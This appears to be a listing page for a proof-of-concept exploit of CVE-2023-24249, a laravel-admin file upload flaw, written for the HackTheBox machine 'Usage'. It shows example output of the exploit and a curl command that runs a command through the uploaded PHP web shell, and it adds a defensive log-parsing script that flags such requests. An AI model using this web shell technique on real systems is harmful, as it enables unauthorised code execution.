CVE-2023-24249 PoC: laravel-admin code issue vulnerability

Associated Vulnerability
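Title: laravel-admin code issue vulnerability (CVE-2023-24249)
Description: z-song laravel-admin is an administrative interface builder for the Laravel web development framework. laravel-admin v1.8.19 contains a security vulnerability caused by an arbitrary file upload flaw; an attacker can exploit it to execute arbitrary code via a crafted PHP file.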
Description
Proof of concept for HTB easy machine Usage
Readme
# CVE-2023-24249 PoC
[CVE-2023-24249](https://nvd.nist.gov/vuln/detail/CVE-2023-24249) is an arbitrary file upload vulnerability in laravel-admin v1.8.19. This proof of concept exploits the vulnerability to upload a web shell.

The exploit was written for use against the HackTheBox easy machine [Usage](https://app.hackthebox.com/machines/Usage).

# Example
```
python3 CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php

curl http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id
uid=1000(dash) gid=1000(dash) groups=1000(dash)
```
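The trace this leaves in a web server access log is a request for a script file inside the upload directory. The following detection sketch is an added example, not part of the original repository; the log lines are constructed, and the `/uploads/` prefix, the extension list and the function name `find_upload_script_hits` are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

UPLOAD_PREFIX = "/uploads/"  # assumption: web-served upload directory, as in the URL above
# Script extensions the PHP handler commonly executes; "(/|$)" also catches PATH_INFO forms.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(/|$)", re.IGNORECASE)
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/May/2024:10:00:01 +0000] "GET /uploads/images/avatar.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/May/2024:10:00:07 +0000] "GET /uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id HTTP/1.1" 200 48 "-" "curl/8.5.0"',
    '198.51.100.9 - - [01/May/2024:10:02:30 +0000] "GET /uploads/images/a%2EPHP/x HTTP/1.1" 404 153 "-" "curl/8.5.0"',
    '198.51.100.7 - - [01/May/2024:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def find_upload_script_hits(lines, prefix=UPLOAD_PREFIX):
    """Return one dict per request for a script file under the upload directory."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m["target"])
        path = unquote(parts.path)  # decode %2E etc. before matching
        if not path.lower().startswith(prefix) or not SCRIPT_EXT.search(path):
            continue
        hits.append({
            "ip": m["ip"],
            "path": path,
            "status": int(m["status"]),
            "has_query": bool(parts.query),
            # 2xx on a script under uploads means the server served or ran it
            "served": m["status"].startswith("2"),
        })
    return hits


if __name__ == "__main__":
    for hit in find_upload_script_hits(SAMPLE_LOG):
        print(hit)
```

A hit with `served` set means the web server answered for a script stored under the upload directory, which should never be handled by the PHP interpreter.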
File Snapshot

```
[4.0K] /data/pocs/7a226f7a9670e41c671fd27d6de3fb05a5ebb7c8
├── [1.0K] CVE-2023-24249.py
└── [ 671] README.md

0 directories, 2 files
```